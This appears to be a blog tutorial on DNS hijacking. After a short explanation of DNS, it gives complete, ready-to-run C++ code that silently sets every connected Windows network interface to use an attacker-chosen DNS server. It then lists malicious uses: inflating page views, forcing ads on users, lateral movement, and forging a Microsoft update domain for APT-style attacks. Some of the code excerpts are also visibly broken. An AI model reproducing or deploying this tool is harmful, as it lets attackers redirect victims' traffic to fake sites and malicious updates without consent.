Why do I always see pop-up ads? Yes, it’s a DNS problem

What is DNS?

Each IP address can have a host name, which consists of one or more strings separated by decimal points. With a host name, you don't have to memorize the IP address of each IP device. Just remember a relatively intuitive and meaningful host name. This is the function of the DNS protocol.

There are two ways to map host names to IP addresses:

1) Static mapping: each device is configured with a mapping from host to IP address. Each device independently maintains its own mapping table, which is only used by the device itself.

2) Dynamic mapping: establish a domain name resolution system (DNS), and only configure the mapping from host to IP address on a dedicated DNS server. Devices on the network that need to communicate using host names must first query the DNS server for the IP address corresponding to the host.

The process of obtaining the IP address corresponding to a host name through a host name is called domain name resolution (or host name resolution). When resolving a domain name, you can first use the static domain name resolution method. If the static domain name resolution fails, then use the dynamic domain name resolution method. You can put some commonly used domain names into the static domain name resolution table, which can greatly improve the efficiency of domain name resolution.

What is DNS hijacking?

DNS hijacking, also known as domain name hijacking, refers to intercepting domain name resolution requests within the hijacked network range, analyzing the requested domain name, and releasing requests outside the review scope. Otherwise, a false IP address is returned or nothing is done to make the request unresponsive. The effect is that a specific network cannot be accessed or a false URL is accessed.

The function of DNS (Domain Name System) is to map a network address (domain name, in the form of a string) to a real network address (IP address) that can be recognized by a computer, so that the computer can further communicate, transmit URLs and content, etc. Since domain name hijacking can often only be carried out within a specific hijacked network range, the domain name server (DNS) outside this range can return a normal IP address. Advanced users can point DNS to these normal domain name servers in the network settings to achieve normal access to the URL. Therefore, domain name hijacking is usually accompanied by measures - blocking the IP of normal DNS.

Header files and namespaces required by the program:

 #include <iostream>
 #include <string>
 #include <windows.h>
 #include <stdlib.h>
 #include <list>
 #include <io.h>
 using namespace std;

Get the available network cards on this machine:

 void Get_using_interface()
 {
      system( "netsh interface show interface > interface_info.txt" );
​
      FILE* fp = fopen( "interface_info.txt" , "rb" );
      const int file_size = filelength(fileno(fp));
 char * buff = ( char *)malloc(sizeof( char )*file_size);
 if (fp) {
        fread(buff, 1, file_size, fp);
 str = buff;
 free (buff);
        replaceA_to_B(str, "-------------------------------------------------------------------------\r\n" , "" );
        Split(str, "\r\n" , interface_using);
        Spilt_space(interface_using);
 }
 }
​
 void Spilt_space(list<string> list_str) {
 for (list<string>::iterator itor = list_str. begin (); itor != list_str. end (); itor++) {
        cout << *itor << endl;
 string::size_type first_variable = (*itor).find( "enabled" );
 string::size_type second_variable = (*itor).find( "connected" );
        string::size_type third_variable = (*itor).find( "Special" );
        if (first_variable != string::npos && second_variable != string::npos && third_variable != string::npos) {
          string info = *itor;
          last_get_interface_using.push_back(info.substr(55,info.length()));
 }
 }
 }
​
 void replaceA_to_B(std::string& S, const std::string A, const std::string B) {
      std::size_t found = S.find(A);
      while (std::string::npos != found) {
        S.replace (found, A.length(), B);
        found = S.find(A, found + 1);
​
 void Split(const string& src, const string& separator, list<string>& dest)
 {
 string str = src;
 string substring ;
      string::size_type start = 0, index ;
 dest.clear();
 index = str.find_first_of(separator, start);
 do
 {
        if ( index != string::npos)
 {
 substring = str.substr(start, index - start);
          dest.push_back( substring );
          start = index + separator. size ();
 index = str.find(separator, start);
          if (start == string::npos) break;
 }
      } while ( index != string::npos);
​
 //the last part
 substring = str.substr(start);
      dest.push_back( substring );
 }

Constructor implementation:

 DNS_Hijack(string DNS= "192.168.1.233" )
 {
 Get_using_interface();
 for (list<string>::iterator itor = last_get_interface_using. begin ();itor!=last_get_interface_using. end ();itor++)
 {
        string str = "netsh interface ip set dns \"" + (*itor) + "\" static " + DNS;
 cout << str;
 system(str.c_str());
 }
 }

Below we will give the complete code directly for users to run and view the effect directly. (Remember to modify the IP address)​

 #include <iostream>
 #include <string>
 #include <windows.h>
 #include <stdlib.h>
 #include <list>
 #include <io.h>
 using namespace std;
​
 class DNS_Hijack {
 private:
 list<string> interface_using; //Get local available network cards
    list<string> last_get_interface_using;
 private:
 string str; //Store the contents of the file after reading
 string DNS;
​
 private:
    void Get_using_interface()
 {
      system( "netsh interface show interface > interface_info.txt" );
​
      FILE* fp = fopen( "interface_info.txt" , "rb" );
      const int file_size = filelength(fileno(fp));
 char * buff = ( char *)malloc(sizeof( char )*file_size);
 if (fp) {
        fread(buff, 1, file_size, fp);
 str = buff;
 free (buff);
        replaceA_to_B(str, "-------------------------------------------------------------------------\r\n" , "" );
        Split(str, "\r\n" , interface_using);
        Spilt_space(interface_using);
 }
 }
​
 private:
    void Spilt_space(list<string> list_str) {
 for (list<string>::iterator itor = list_str. begin (); itor != list_str. end (); itor++) {
        cout << *itor << endl;
 string::size_type first_variable = (*itor).find( "enabled" );
 string::size_type second_variable = (*itor).find( "connected" );
        string::size_type third_variable = (*itor).find( "Special" );
        if (first_variable != string::npos && second_variable != string::npos && third_variable != string::npos) {
          string info = *itor;
          last_get_interface_using.push_back(info.substr(55,info.length()));
 }
 }
​
 }
​
 private:
    void replaceA_to_B(std::string& S, const std::string A, const std::string B) {
      std::size_t found = S.find(A);
      while (std::string::npos != found) {
        S.replace (found, A.length(), B);
        found = S.find(A, found + 1);
 }
 }
​
 private:
    void Split(const string& src, const string& separator, list<string>& dest)
 {
 string str = src;
 string substring ;
      string::size_type start = 0, index ;
 dest.clear();
 index = str.find_first_of(separator, start);
 do
 {
        if ( index != string::npos)
 {
 substring = str.substr(start, index - start);
          dest.push_back( substring );
          start = index + separator. size ();
 index = str.find(separator, start);
          if (start == string::npos) break;
 }
      } while ( index != string::npos);
​
 //the last part
 substring = str.substr(start);
      dest.push_back( substring );
 }
​
 public :
    DNS_Hijack(string DNS= "192.168.1.233" )
 {
 Get_using_interface();
 for (list<string>::iterator itor = last_get_interface_using. begin ();itor!=last_get_interface_using. end ();itor++)
 {
        string str = "netsh interface ip set dns \"" + (*itor) + "\" static " + DNS;
 cout << str;
 system(str.c_str());
 }
 }
​
 };
​
 int main()
 {
  DNS_Hijack* one = new DNS_Hijack( "192.168.1.20" );
 system( "pause" );
 return 0;
 }

Now I have built a DNS server in the virtual machine win2003, with the IP address: 192.168.1.20, and resolved all requests with the domain name www.baidu.com to an Apache server in my intranet.

At this time, my request for www.baidu.com will be resolved to the address of my Apache server through the DNS server in my intranet.

That is to say, we can no longer get the real Baidu IP address. We can also see through nslookup that the DNS has been hijacked.

Experimental results:

Some uses:

• We can use this method to let users visit a specific URL to maliciously increase the PE volume of the website.
• If the website is connected to an advertising alliance, this method can be used to allow users to directly see the advertisements on the website.
• Marketing, promotion, etc.
• It can be used for lateral penetration and privilege escalation in a local area network, and can be partially reflected in APT attacks. (Forged Microsoft update server domain name.)